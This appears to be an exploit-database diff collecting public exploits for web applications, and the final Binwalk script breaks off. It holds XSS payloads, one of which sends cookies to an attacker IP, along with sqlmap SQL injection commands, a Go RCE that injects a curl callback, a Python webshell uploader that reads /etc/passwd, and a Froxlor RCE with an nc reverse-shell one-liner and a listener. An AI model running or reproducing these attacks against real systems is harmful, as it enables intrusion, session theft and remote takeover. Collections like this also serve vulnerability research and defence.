User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"
66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"
34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"
openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"
1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"
openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"
25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"
------WebKitFormBoundaryc8btjvyb3An7HcmA--
And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce
private youtube video poc : https://youtu.be/Ln7KluDfnk4

76
exploits/php/webapps/51240.txt Normal file
View file

@ -0,0 +1,76 @@
## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.29.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion `point 1` is copied into the HTML
document as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
[+] Response:
```
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546
Class \App\Pages\Chatgiflc<a
href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img
src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```
## Proof and Exploit:
[href](https://streamable.com/aadj5c)
## Reference:
[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

51
exploits/php/webapps/51241.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page:
https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation and CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in it.
#POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below
<html>
<body>
<form action="
https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"
method="POST">
<input type="hidden" name="Subject"
value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align:
left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The XSS will be triggered when viewing the related event

27
exploits/php/webapps/51242.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP
# Description
The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.
# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)
# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
# Prof of concept:
- From /contact.php, send a message containing the following payload in "title" or "message" fields:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first url have to be an existing image)
- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php
- Your listener will receive the PHP session id.

74
exploits/php/webapps/51245.txt Normal file
View file

@ -0,0 +1,74 @@
## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based
## Description:
The bgERP system suffers from unsecured login cookies in which cookies
are stored as very sensitive login and also login session information!
The attacker can trick the already login user and can steal the
already generated cookie from the system and can do VERY DANGEROUS
things with the already stored sensitive information.
This can be very expensive for all companies which are using this
system, please be careful!
Also, this system has a vulnerable search parameter for XSS-Reflected attacks!
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1
HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```
[+] Response after logout of the system:
```HTTP
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
OK
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)
## Proof and Exploit:
[href](https://streamable.com/xhffdu)
## Time spent
`01:30:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

76
exploits/php/webapps/51246.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -
------------------------------------------------------------------------------------
1. Description:
----------------------
Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------
Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.
Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql
SQLMap Response:
[*] starting @ 04:49:58 /2023-02-01/
[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
3. Example payload:
----------------------
(boolean-based)
' AND 1=1 AND 'test'='test
4. Burpsuite request:
----------------------
GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close

65
exploits/php/webapps/51250.go Executable file
View file

@ -0,0 +1,65 @@
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
package main
import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)
func main() {
var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
flag.Parse()
banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)
`
fmt.Printf(banner)
fmt.Println("[*] Triggering cURL command")
fmt.Println("[*] Open Listener on " + call + "")
//Skip certificate validation
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{Transport: tr}
// Request URL
url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"
// Request body
body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))
// Create HTTP client and send POST request
req, err := http.NewRequest("POST", url, body)
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
fmt.Println("Error sending request:", err)
return
}
time.Sleep(2 * time.Second)
defer resp.Body.Close()
fmt.Println("\n[*] Check Listener for OOB callback")
}

158
exploits/php/webapps/51251.py Executable file
View file

@ -0,0 +1,158 @@
# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
# Date: 02-Feb-2023
# Exploit Author: Galoget Latorre (@galoget)
# Vendor Homepage: https://responsivefilemanager.com
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip
# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604
# Version: 9.9.5
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2022.3 64-bit
# CVE: CVE-2022-46604 (Konstantin Burov)
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py 127.0.0.1
def banner():
"""
Function to print the banner
"""
banner_text = """
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___
| | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | |
| --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ |
|_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_|
File Creation Extension Bypass in Responsive FileManager 9.9.5 (RCE)
Exploit Author: Galoget Latorre (@galoget)
CVE Author: Konstantin Burov
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The aplication MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target site, which can be a domain or an IP Address
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py 127.0.0.1")
sys.exit(0)
def run_command(web_session, webshell_url, command_to_run):
"""
Function that:
- Interacts with the webshell to run a command
- Cleans the response of the webshell
- Returns the response object and the output of the command
"""
webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers)
command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser')
return (webshell_response, command_output_soup.find('pre').text)
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1]:
host = sys.argv[1]
else:
host = "127.0.0.1"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
}
# URL to create a new file
target_url = f"http://{host}/filemanager/execute.php?action=create_file"
# Change this to customize the payload (i.e. The content of the malicious file that will be created)
payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>"
# oneliner_payload = " <?=`$_GET[_]`?>"
# URL to get a PHPSESSID value
cookie_url = f"http://{host}/filemanager/dialog.php"
# New Session
session = requests.Session()
# GET request to retrieve a PHPSESSID value
cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue")
try:
session.get(url = cookie_url, headers = headers)
except:
cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red")
sys.exit(0)
if session.cookies.get_dict():
cprint("[+] PHPSESSID retrieved correctly.", "green")
cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow")
else:
cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red")
# Params, rename if you want
params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload}
# POST request to create the webshell
cprint(f"\n[*] Attempting to create a webshell on {host}", "blue")
response = session.post(url = target_url, headers = headers, data = params)
# If the status code and the message match, we may have a webshell inside. ;)
if response.status_code == 200 and response.text == "File successfully saved.":
# Default webshell path
shell_url = f"http://{host}/source/shell.php"
# Verify if the shell was uploaded by running whoami and cat /etc/passwd
webshell, whoami_output = run_command(session, shell_url, "whoami")
webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd")
# Common users when getting a webshell
common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"]
# Verify if the command was executed correctly
if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output:
cprint("[+] Webshell uploaded - Enjoy!", "green")
cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow")
cprint(f"[+] Running `whoami` command: {whoami_output}", "green")
# Ask to enter into a pseudo-interactive mode with the webshell
answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta"))
if answer.upper() == "Y":
cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue")
command = ""
while command != "exit":
command = input(colored(">> ", "cyan")).lower()
webshell, command_output = run_command(session, shell_url, command)
if command != "exit":
cprint(command_output, "cyan")
cprint("\n[*] Exiting...Bye!", "blue")
elif response.status_code == 403 and response.text == "The file is already existing":
cprint("[-] The file that you're trying to create is already on the server.", "red")
else:
cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")

13
exploits/php/webapps/51253.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520
SQL injection vulnerability in itech TrainSmart r1044 allows remote
attackers to view sensitive information via crafted command using sqlmap.
PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs

29
exploits/php/webapps/51260.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: February 09, 2023
# Exploit Author: Manish Pathak
# Vendor Homepage: https://cksource.com/
# Software Link: https://ckeditor.com/ckeditor-5/download/
# Version: 35.4.0
# Tested on: Linux / Web
# CVE : CVE-2022-48110
CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via Full Featured CKEditor5 Widget as the editor fails to sanitize user provided data.
An attacker can execute arbitrary script in the browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CKEditor5 version 35.4.0 is tested & found to be vulnerable.
Documentation avaiable at https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#security
Security Docs Says """The HTML embed feature does not currently execute code in <script> tags. However, it will execute code in the on* and src="javascript:..." attributes."""
Payload:
<div class="raw-html-embed">
<script>alert(456)</script>
</div>

14
exploits/php/webapps/51261.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read
# Google Dork: N/A
# Date: 06/02/2023
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/
# Version: <= 7.1.0-49
# Tested on: 7.1.0-49 and 6.9.11-60
# CVE : CVE-2022-44268 (CVE Owner: Metabase Q Team
https://www.metabaseq.com/imagemagick-zero-days/)
# Exploit pre-requirements: Rust
# PoC : https://github.com/voidz0r/CVE-2022-44268

139
exploits/php/webapps/51263.py Executable file
View file

@ -0,0 +1,139 @@
#!/usr/bin/python3
# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE)
# Date: 2023-01-08
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2023-0315
# Vendor Homepage: https://froxlor.org/
# Version: v2.0.3
# Tested on: Ubuntu 20.04 / PHP 8.2
import telnetlib
import requests
import socket
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
from threading import Thread
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
if len(sys.argv) !=3D 6:
print("[~] Usage : ./froxlor-rce.py url username password ip port")
exit()
url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]
request =3D requests.session()
def login():
login_info =3D {
"loginname": username,
"password": password,
"send": "send",
"dologin": ""
}
login_request =3D request.post(url+"/index.php", login_info, allow_redi=
rects=3DFalse)
login_headers =3D login_request.headers
location_header =3D login_headers["Location"]
if location_header =3D=3D "admin_index.php":
return True
else:
return False
def change_log_path():
change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part=
=3Dlogging"
csrf_token_req =3D request.get(change_log_path_url)
csrf_token_req_response =3D csrf_token_req.text
soup =3D BeautifulSoup(csrf_token_req_response, "lxml")
csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])
print("[+] Main CSRF token retrieved %s" % csrf_token)
multipart_data =3D {
"logger_enabled": (None, "0"),
"logger_enabled": (None, "1"),
"logger_severity": (None, "2"),
"logger_logtypes[]": (None, "file"),
"logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f=
ooter.html.twig"),
"logger_log_cron": (None, "0"),
"csrf_token": (None, csrf_token),
"page": (None, "overview"),
"action": (None, ""),
"send": (None, "send")
=20
}
req =3D request.post(change_log_path_url, files=3Dmultipart_data)
response =3D req.text
if "The settings have been successfully saved." in response:
print("[+] Changed log file path!")
return True
else:
return False
def inject_template():
admin_page_path =3D url + "/admin_index.php"
csrf_token_req =3D request.get(admin_page_path)
csrf_token_req_response =3D csrf_token_req.text
soup =3D BeautifulSoup(csrf_token_req_response, "lxml")
csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])
onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} =
{1} >/tmp/f".format(ip, port)
payload =3D "{{['%s']|filter('exec')}}" % onliner
data =3D {
"theme": payload,
"csrf_token": csrf_token,
"page": "change_theme",
"send": "send",
"dosave": "",
}
req =3D request.post(admin_page_path, data, allow_redirects=3DFalse)
try:
location_header =3D req.headers["Location"]
if location_header =3D=3D "admin_index.php":
print("[+] Injected the payload sucessfully!")
except:
print("[-] Can't Inject payload :/")
exit()
handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,))
handler_thread.start()
print("[+] Triggering the payload ...")
req2 =3D request.get(admin_page_path)
def connection_handler(port):
print("[+] Listener started on port %s" % port)
t =3D telnetlib.Telnet()
s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", int(port)))
s.listen(1)
conn, addr =3D s.accept()
print("[+] Connection received from %s" % addr[0])
t.sock =3D conn
print("[+] Heads up, incoming shell!!")
t.interact()
if login():
print("[+] Successfully Logged in!")
index_url =3D url + "/admin_index.php"
request.get(index_url)
if change_log_path():
inject_template()
else:
print("[-] Can't login")

55
exploits/python/remote/51249.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
import os
import inspect
import argparse
print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)
args = parser.parse_args()
if args.file and args.ip and args.port:
